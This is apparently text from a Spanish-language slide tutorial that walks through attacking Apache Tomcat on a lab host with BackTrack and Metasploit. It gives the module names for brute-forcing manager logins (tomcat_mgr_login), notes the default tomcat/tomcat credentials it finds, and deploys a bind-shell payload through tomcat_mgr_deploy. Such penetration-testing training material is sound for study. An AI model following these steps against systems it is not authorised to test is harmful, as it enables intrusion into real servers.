HACKING APACHE TOMCAT CON BACKTRACK escanear red para el equipo vulnerable Una vez obteniendo la IP victima procedemos

a realizar un escaneo. Abrimos una consola con msfconsole En mi caso mi direccin IP victima es 192.168.1.89

Podemos realizar un escaneo mas profundo para obtener las versiones de nuestra IP victima.

Resultado del escaneo,observamos la versin de apache tomcat.

G. NAYELI JIMENEZ BAUTISTA

Desde una nueva consola ejecutamos lo siguiente: navegador, IP y el puerto por defecto de apache tomcat

Y como podemos ver la pagina de apache tomcat

G. NAYELI JIMENEZ BAUTISTA

Desde la pestaa de tomcat Administration podemos entrar al sitio solo necesitamos el login y contrasea que procederemos a hackear.

Buscamos vulnerabilidades y ejecutamos el siguiente comando G. NAYELI JIMENEZ BAUTISTA

search tomcat

Utilizaremos la slguiente opcin: use auxiliary/scanner/http/tomcat_mgr_login

G. NAYELI JIMENEZ BAUTISTA

show options

Tecleamos los siguientes comandos el IP de la victima y cambiamos el puerto

Realizamos un show options para ver si se cambio el puerto Luego enviamos el exploit

G. NAYELI JIMENEZ BAUTISTA

G. NAYELI JIMENEZ BAUTISTA

En el exploit me dice que es el usuario tomcat y password tomcat

Ya tenemos acceso al sitio.

G. NAYELI JIMENEZ BAUTISTA

Podemos buscar otras opciones

Ahora utilizaremos el siguiente exploit: use exploit/multi/http/tomcat_mgr_deploy

Doy show options

G. NAYELI JIMENEZ BAUTISTA

Decimos cual es el password y contrasea,IP y buscamos opciones

Ejecutamos show payloads

G. NAYELI JIMENEZ BAUTISTA

El que utilizaremos sera: set payload generic/shell_bind_tcp despus buscaremos vulnerabilidades con: show options y enviamos el exploit.

G. NAYELI JIMENEZ BAUTISTA